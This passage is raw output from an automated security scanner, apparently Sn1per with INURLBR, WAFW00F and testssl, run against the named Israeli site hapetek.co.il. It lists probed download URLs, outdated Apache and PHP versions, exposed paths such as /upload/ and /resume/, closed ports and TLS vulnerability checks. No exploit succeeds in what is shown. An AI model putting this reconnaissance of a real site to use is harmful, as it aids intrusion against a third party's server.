  2952. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2953. |_[ + ] More details::  / - / , ISP: 
  2954. |_[ + ] Found:: UNIDENTIFIED
  2955. 
  2956.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2957. |_[ + ] [ 61 / 100 ]-[22:17:22] [ - ] 
  2958. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=8887 ]
  2959. |_[ + ] Exploit:: 
  2960. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2961. |_[ + ] More details::  / - / , ISP: 
  2962. |_[ + ] Found:: UNIDENTIFIED
  2963. 
  2964.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2965. |_[ + ] [ 62 / 100 ]-[22:17:23] [ - ] 
  2966. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=323 ]
  2967. |_[ + ] Exploit:: 
  2968. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2969. |_[ + ] More details::  / - / , ISP: 
  2970. |_[ + ] Found:: UNIDENTIFIED
  2971. 
  2972.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2973. |_[ + ] [ 63 / 100 ]-[22:17:23] [ - ] 
  2974. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=255 ]
  2975. |_[ + ] Exploit:: 
  2976. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2977. |_[ + ] More details::  / - / , ISP: 
  2978. |_[ + ] Found:: UNIDENTIFIED
  2979. 
  2980.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2981. |_[ + ] [ 64 / 100 ]-[22:17:24] [ - ] 
  2982. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=8755 ]
  2983. |_[ + ] Exploit:: 
  2984. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2985. |_[ + ] More details::  / - / , ISP: 
  2986. |_[ + ] Found:: UNIDENTIFIED
  2987. 
  2988.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2989. |_[ + ] [ 65 / 100 ]-[22:17:25] [ - ] 
  2990. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=8767 ]
  2991. |_[ + ] Exploit:: 
  2992. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2993. |_[ + ] More details::  / - / , ISP: 
  2994. |_[ + ] Found:: UNIDENTIFIED
  2995. 
  2996.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2997. |_[ + ] [ 66 / 100 ]-[22:17:25] [ - ] 
  2998. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=34 ]
  2999. |_[ + ] Exploit:: 
  3000. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  3001. |_[ + ] More details::  / - / , ISP: 
  3002. |_[ + ] Found:: UNIDENTIFIED
  3003. 
  3004.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  3005. |_[ + ] [ 67 / 100 ]-[22:17:26] [ - ] 
  3006. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=410 ]
  3007. |_[ + ] Exploit:: 
  3008. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  3009. |_[ + ] More details::  / - / , ISP: 
  3010. |_[ + ] Found:: UNIDENTIFIED
  3011. 
  3012.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  3013. |_[ + ] [ 68 / 100 ]-[22:17:26] [ - ] 
  3014. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=57 ]
  3015. |_[ + ] Exploit:: 
  3016. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  3017. |_[ + ] More details::  / - / , ISP: 
  3018. |_[ + ] Found:: UNIDENTIFIED
  3019. 
  3020.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  3021. |_[ + ] [ 69 / 100 ]-[22:17:27] [ - ] 
  3022. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=332 ]
  3023. |_[ + ] Exploit:: 
  3024. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  3025. |_[ + ] More details::  / - / , ISP: 
  3026. |_[ + ] Found:: UNIDENTIFIED
  3027. 
  3028.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  3029. |_[ + ] [ 70 / 100 ]-[22:17:28] [ - ] 
  3030. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=121 ]
  3031. |_[ + ] Exploit:: 
  3032. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  3033. |_[ + ] More details::  / - / , ISP: 
  3034. |_[ + ] Found:: UNIDENTIFIED
  3035. 
  3036.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  3037. |_[ + ] [ 71 / 100 ]-[22:17:28] [ - ] 
  3038. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=368 ]
  3039. |_[ + ] Exploit:: 
  3040. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  3041. |_[ + ] More details::  / - / , ISP: 
  3042. |_[ + ] Found:: UNIDENTIFIED
  3043. 
  3044.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  3045. |_[ + ] [ 72 / 100 ]-[22:17:29] [ - ] 
  3046. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=8850 ]
  3047. |_[ + ] Exploit:: 
  3048. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  3049. |_[ + ] More details::  / - / , ISP: 
  3050. |_[ + ] Found:: UNIDENTIFIED
  3051. 
  3052.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  3053. |_[ + ] [ 73 / 100 ]-[22:17:29] [ - ] 
  3054. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=92 ]
  3055. |_[ + ] Exploit:: 
  3056. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  3057. |_[ + ] More details::  / - / , ISP: 
  3058. |_[ + ] Found:: UNIDENTIFIED
  3059. 
  3060.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  3061. |_[ + ] [ 74 / 100 ]-[22:17:30] [ - ] 
  3062. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=414 ]
  3063. |_[ + ] Exploit:: 
  3064. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  3065. |_[ + ] More details::  / - / , ISP: 
  3066. |_[ + ] Found:: UNIDENTIFIED
  3067. 
  3068.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  3069. |_[ + ] [ 75 / 100 ]-[22:17:38] [ - ] 
  3070. |_[ + ] Target:: [ http://www.hapetek.co.il/files/044129/044129-Summary ]
  3071. |_[ + ] Exploit:: 
  3072. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.14 (Ubuntu) , IP:212.143.6.110:80 
  3073. |_[ + ] More details::  / - / , ISP: 
  3074. |_[ + ] Found:: UNIDENTIFIED
  3075. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 70072 out of 580039 bytes received
  3076. 
  3077.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  3078. |_[ + ] [ 76 / 100 ]-[22:17:38] [ - ] 
  3079. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=319 ]
  3080. |_[ + ] Exploit:: 
  3081. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  3082. |_[ + ] More details::  / - / , ISP: 
  3083. |_[ + ] Found:: UNIDENTIFIED
  3084. 
  3085.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  3086. |_[ + ] [ 77 / 100 ]-[22:17:39] [ - ] 
  3087. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=406 ]
  3088. |_[ + ] Exploit:: 
  3089. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  3090. |_[ + ] More details::  / - / , ISP: 
  3091. |_[ + ] Found:: UNIDENTIFIED
  3092. 
  3093.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  3094. |_[ + ] [ 78 / 100 ]-[22:17:39] [ - ] 
  3095. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=337 ]
  3096. |_[ + ] Exploit:: 
  3097. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  3098. |_[ + ] More details::  / - / , ISP: 
  3099. |_[ + ] Found:: UNIDENTIFIED
  3100. 
  3101.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  3102. |_[ + ] [ 79 / 100 ]-[22:17:40] [ - ] 
  3103. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=234 ]
  3104. |_[ + ] Exploit:: 
  3105. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  3106. |_[ + ] More details::  / - / , ISP: 
  3107. |_[ + ] Found:: UNIDENTIFIED
  3108. 
  3109.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  3110. |_[ + ] [ 80 / 100 ]-[22:17:41] [ - ] 
  3111. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=8882 ]
  3112. |_[ + ] Exploit:: 
  3113. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  3114. |_[ + ] More details::  / - / , ISP: 
  3115. |_[ + ] Found:: UNIDENTIFIED
  3116. 
  3117.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  3118. |_[ + ] [ 81 / 100 ]-[22:17:41] [ - ] 
  3119. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=143 ]
  3120. |_[ + ] Exploit:: 
  3121. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  3122. |_[ + ] More details::  / - / , ISP: 
  3123. |_[ + ] Found:: UNIDENTIFIED
  3124. 
  3125.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  3126. |_[ + ] [ 82 / 100 ]-[22:17:42] [ - ] 
  3127. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=61 ]
  3128. |_[ + ] Exploit:: 
  3129. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  3130. |_[ + ] More details::  / - / , ISP: 
  3131. |_[ + ] Found:: UNIDENTIFIED
  3132. 
  3133.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  3134. |_[ + ] [ 83 / 100 ]-[22:17:42] [ - ] 
  3135. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=8744 ]
  3136. |_[ + ] Exploit:: 
  3137. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  3138. |_[ + ] More details::  / - / , ISP: 
  3139. |_[ + ] Found:: UNIDENTIFIED
  3140. 
  3141.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  3142. |_[ + ] [ 84 / 100 ]-[22:17:43] [ - ] 
  3143. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=47 ]
  3144. |_[ + ] Exploit:: 
  3145. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  3146. |_[ + ] More details::  / - / , ISP: 
  3147. |_[ + ] Found:: UNIDENTIFIED
  3148. 
  3149.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  3150. |_[ + ] [ 85 / 100 ]-[22:17:44] [ - ] 
  3151. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=416 ]
  3152. |_[ + ] Exploit:: 
  3153. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  3154. |_[ + ] More details::  / - / , ISP: 
  3155. |_[ + ] Found:: UNIDENTIFIED
  3156. 
  3157.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  3158. |_[ + ] [ 86 / 100 ]-[22:17:44] [ - ] 
  3159. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=8884 ]
  3160. |_[ + ] Exploit:: 
  3161. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  3162. |_[ + ] More details::  / - / , ISP: 
  3163. |_[ + ] Found:: UNIDENTIFIED
  3164. 
  3165.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  3166. |_[ + ] [ 87 / 100 ]-[22:17:45] [ - ] 
  3167. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=8781 ]
  3168. |_[ + ] Exploit:: 
  3169. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  3170. |_[ + ] More details::  / - / , ISP: 
  3171. |_[ + ] Found:: UNIDENTIFIED
  3172. 
  3173.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  3174. |_[ + ] [ 88 / 100 ]-[22:17:45] [ - ] 
  3175. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=8877 ]
  3176. |_[ + ] Exploit:: 
  3177. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  3178. |_[ + ] More details::  / - / , ISP: 
  3179. |_[ + ] Found:: UNIDENTIFIED
  3180. 
  3181.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  3182. |_[ + ] [ 89 / 100 ]-[22:17:46] [ - ] 
  3183. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=8762 ]
  3184. |_[ + ] Exploit:: 
  3185. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  3186. |_[ + ] More details::  / - / , ISP: 
  3187. |_[ + ] Found:: UNIDENTIFIED
  3188. 
  3189.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  3190. |_[ + ] [ 90 / 100 ]-[22:17:47] [ - ] 
  3191. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=8813 ]
  3192. |_[ + ] Exploit:: 
  3193. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  3194. |_[ + ] More details::  / - / , ISP: 
  3195. |_[ + ] Found:: UNIDENTIFIED
  3196. 
  3197.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  3198. |_[ + ] [ 91 / 100 ]-[22:17:47] [ - ] 
  3199. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=133 ]
  3200. |_[ + ] Exploit:: 
  3201. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  3202. |_[ + ] More details::  / - / , ISP: 
  3203. |_[ + ] Found:: UNIDENTIFIED
  3204. 
  3205.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  3206. |_[ + ] [ 92 / 100 ]-[22:17:48] [ - ] 
  3207. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=407 ]
  3208. |_[ + ] Exploit:: 
  3209. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  3210. |_[ + ] More details::  / - / , ISP: 
  3211. |_[ + ] Found:: UNIDENTIFIED
  3212. 
  3213.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  3214. |_[ + ] [ 93 / 100 ]-[22:17:48] [ - ] 
  3215. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=85 ]
  3216. |_[ + ] Exploit:: 
  3217. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  3218. |_[ + ] More details::  / - / , ISP: 
  3219. |_[ + ] Found:: UNIDENTIFIED
  3220. 
  3221.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  3222. |_[ + ] [ 94 / 100 ]-[22:17:49] [ - ] 
  3223. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=8892 ]
  3224. |_[ + ] Exploit:: 
  3225. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  3226. |_[ + ] More details::  / - / , ISP: 
  3227. |_[ + ] Found:: UNIDENTIFIED
  3228. 
  3229.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  3230. |_[ + ] [ 95 / 100 ]-[22:17:50] [ - ] 
  3231. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=200 ]
  3232. |_[ + ] Exploit:: 
  3233. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  3234. |_[ + ] More details::  / - / , ISP: 
  3235. |_[ + ] Found:: UNIDENTIFIED
  3236. 
  3237.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  3238. |_[ + ] [ 96 / 100 ]-[22:17:50] [ - ] 
  3239. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=381 ]
  3240. |_[ + ] Exploit:: 
  3241. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  3242. |_[ + ] More details::  / - / , ISP: 
  3243. |_[ + ] Found:: UNIDENTIFIED
  3244. 
  3245.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  3246. |_[ + ] [ 97 / 100 ]-[22:17:51] [ - ] 
  3247. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=421 ]
  3248. |_[ + ] Exploit:: 
  3249. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  3250. |_[ + ] More details::  / - / , ISP: 
  3251. |_[ + ] Found:: UNIDENTIFIED
  3252. 
  3253.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  3254. |_[ + ] [ 98 / 100 ]-[22:17:51] [ - ] 
  3255. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=275 ]
  3256. |_[ + ] Exploit:: 
  3257. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  3258. |_[ + ] More details::  / - / , ISP: 
  3259. |_[ + ] Found:: UNIDENTIFIED
  3260. 
  3261.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  3262. |_[ + ] [ 99 / 100 ]-[22:17:52] [ - ] 
  3263. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=8776 ]
  3264. |_[ + ] Exploit:: 
  3265. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  3266. |_[ + ] More details::  / - / , ISP: 
  3267. |_[ + ] Found:: UNIDENTIFIED
  3268.  
  3269. [ INFO ] [ Shutting down ]
  3270. [ INFO ] [ End of process INURLBR at [30-12-2017 22:17:52]
  3271. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 7 ]
  3272. [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-hapetek.co.il.txt ]
  3273. |_________________________________________________________________________________________
  3274. http://www.hapetek.co.il/games/nblox/
  3275. http://www.hapetek.co.il/resume/
  3276. http://www.hapetek.co.il/upload/
  3277. http://www.hapetek.co.il/games/head-blast/
  3278. http://www.hapetek.co.il/games/Snake/index.php
  3279. http://www.hapetek.co.il/games/Snake/index.php/snake.swf
  3280. http://www.hapetek.co.il/career/resume.php
  3281.  
  3282. \_________________________________________________________________________________________/
  3283.  
  3284.  + -- --=[Port 110 closed... skipping.
  3285.  + -- --=[Port 111 closed... skipping.
  3286.  + -- --=[Port 135 closed... skipping.
  3287.  + -- --=[Port 139 closed... skipping.
  3288.  + -- --=[Port 161 closed... skipping.
  3289.  + -- --=[Port 162 closed... skipping.
  3290.  + -- --=[Port 389 closed... skipping.
  3291.  + -- --=[Port 443 opened... running tests...
  3292.  + -- ----------------------------=[Checking for WAF]=------------------------ -- +
  3293.  
  3294. ^ ^
  3295. _ __ _ ____ _ __ _ _ ____
  3296. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  3297. | V V // o // _/ | V V // 0 // 0 // _/
  3298. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  3299. <
  3300. ...'
  3301.  
  3302. WAFW00F - Web Application Firewall Detection Tool
  3303.  
  3304. By Sandro Gauci && Wendel G. Henrique
  3305.  
  3306. Checking https://hapetek.co.il
  3307.  
  3308.  + -- ----------------------------=[Checking Cloudflare]=--------------------- -- +
  3309.  + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
  3310. https://hapetek.co.il [ Unassigned]
  3311.  
  3312.  + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +
  3313. Version: 1.11.10-static
  3314. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  3315. 
  3316. Testing SSL server hapetek.co.il on port 443 using SNI name hapetek.co.il
  3317.  
  3318. TLS Fallback SCSV:
  3319. Server does not support TLS Fallback SCSV
  3320.  
  3321. TLS renegotiation:
  3322. Session renegotiation not supported
  3323.  
  3324. TLS Compression:
  3325. Compression disabled
  3326.  
  3327. Heartbleed:
  3328. TLS 1.2 not vulnerable to heartbleed
  3329. TLS 1.1 not vulnerable to heartbleed
  3330. TLS 1.0 not vulnerable to heartbleed
  3331.  
  3332. Supported Server Cipher(s):
  3333. 
  3334. ###########################################################
  3335. testssl 2.9dev from https://testssl.sh/dev/
  3336. 
  3337. This program is free software. Distribution and
  3338. modification under GPLv2 permitted.
  3339. USAGE w/o ANY WARRANTY. USE IT AT YOUR OWN RISK!
  3340.  
  3341. Please file bugs @ https://testssl.sh/bugs/
  3342. 
  3343. ###########################################################
  3344.  
  3345. Using "OpenSSL 1.0.2-chacha (1.0.2i-dev)" [~183 ciphers]
  3346. on Kali:/usr/share/sniper/plugins/testssl.sh/bin/openssl.Linux.x86_64
  3347. (built: "Jun 22 19:32:29 2016", platform: "linux-x86_64")
  3348.  
  3349.  
  3350.  Start 2017-12-30 22:18:10 -->> 212.143.6.110:443 (hapetek.co.il) <<--
  3351.  
  3352. rDNS (212.143.6.110): --
  3353.  
  3354.  212.143.6.110:443 doesn't seem to be a TLS/SSL enabled server
  3355.  The results might look ok but they could be nonsense. Really proceed ? ("yes" to continue) -->  Service detected: Couldn't determine what's running on port 443, assuming no HTTP service => skipping all HTTP checks
  3356.  
  3357.  
  3358.  Testing protocols via sockets except SPDY+HTTP2 
  3359.  
  3360.  SSLv2 not offered (OK)
  3361.  SSLv3 Fixme: unexpected value around line 4369, rerun with DEBUG>=2
  3362.  TLS 1 Fixme: unexpected value around line 4431, rerun with DEBUG>=2
  3363.  TLS 1.1 Fixme: unexpected value around line 4496, rerun with DEBUG>=2
  3364.  TLS 1.2 Fixme: unexpected value around line 4572, rerun with DEBUG>=2
  3365.  TLS 1.3 Fixme: unexpected value around line 4691, rerun with DEBUG>=2
  3366.  
  3367. You should not proceed as no protocol was detected. If you still really really want to, say "YES" -->  SPDY/NPN not offered
  3368.  HTTP2/ALPN not offered
  3369.  
  3370.  Testing ~standard cipher categories 
  3371.  
  3372.  NULL ciphers (no encryption) not offered (OK)
  3373.  Anonymous NULL Ciphers (no authentication) not offered (OK)
  3374.  Export ciphers (w/o ADH+NULL) not offered (OK)
  3375.  LOW: 64 Bit + DES encryption (w/o export) not offered (OK)
  3376.  Weak 128 Bit ciphers (SEED, IDEA, RC[2,4]) not offered (OK)
  3377.  Triple DES Ciphers (Medium) not offered (OK)
  3378.  High encryption (AES+Camellia, no AEAD) not offered
  3379.  Strong encryption (AEAD ciphers) not offered
  3380.  
  3381.  
  3382.  Testing robust (perfect) forward secrecy, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4 
  3383.  
  3384.  No ciphers supporting Forward Secrecy offered
  3385.  
  3386.  
  3387.  Testing server preferences 
  3388.  
  3389.  Has server cipher order? no matching cipher in this list found (pls report this): DES-CBC3-SHA:RC4-MD5:DES-CBC-SHA:RC4-SHA:AES128-SHA:AES128-SHA256:AES256-SHA:ECDHE-RSA-AES128-SHA:DHE-RSA-AES128-SHA:DHE-RSA-AES256-SHA:ECDH-RSA-DES-CBC3-SHA:ECDH-RSA-AES128-SHA:ECDH-RSA-AES256-SHA:ECDHE-RSA-AES256-GCM-SHA384:DHE-RSA-AES128-SHA256:DHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES128-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-SHA384:ECDHE-RSA-AES256-SHA:DHE-DSS-AES256-GCM-SHA384:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES128-GCM-SHA256:AES256-SHA256 .
  3390.  
  3391.  Testing server defaults (Server Hello) 
  3392.  
  3393.  TLS extensions (standard) (none)
  3394.  Session Ticket RFC 5077 hint (no lifetime advertised)
  3395.  SSL Session ID support yes
  3396.  Session Resumption Ticket resumption test failed, pls report / ID resumption test failed, pls report
  3397.  TLS clock skew SSLv3 through TLS 1.2 didn't return a timestamp
  3398.  
  3399.  Testing vulnerabilities 
  3400.  
  3401.  Heartbleed (CVE-2014-0160) not vulnerable (OK), no heartbeat extension
  3402.  CCS (CVE-2014-0224) not vulnerable (OK)
  3403.  Ticketbleed (CVE-2016-9244), experiment. -- (applicable only for HTTPS)
  3404.  ROBOT Server does not support any cipher suites that use RSA key transport
  3405.  Secure Renegotiation (CVE-2009-3555) handshake didn't succeed
  3406.  Secure Client-Initiated Renegotiation not vulnerable (OK)
  3407.  CRIME, TLS (CVE-2012-4929) test failed (couldn't connect)
  3408.  POODLE, SSL (CVE-2014-3566) not vulnerable (OK)
  3409.  TLS_FALLBACK_SCSV (RFC 7507) No fallback possible, TLS 1.2 is the only protocol (OK)
  3410.  SWEET32 (CVE-2016-2183, CVE-2016-6329) not vulnerable (OK)
  3411.  FREAK (CVE-2015-0204) not vulnerable (OK)
  3412.  DROWN (CVE-2016-0800, CVE-2016-0703) not vulnerable on this host and port (OK)
  3413. no RSA certificate, thus certificate can't be used with SSLv2 elsewhere
  3414.  LOGJAM (CVE-2015-4000), experimental not vulnerable (OK): no DH EXPORT ciphers, no DH key detected
  3415.  BEAST (CVE-2011-3389) no SSL3 or TLS1 (OK)
  3416.  LUCKY13 (CVE-2013-0169), experimental not vulnerable (OK)
  3417.  RC4 (CVE-2013-2566, CVE-2015-2808) no RC4 ciphers detected (OK)
  3418.  
  3419.  
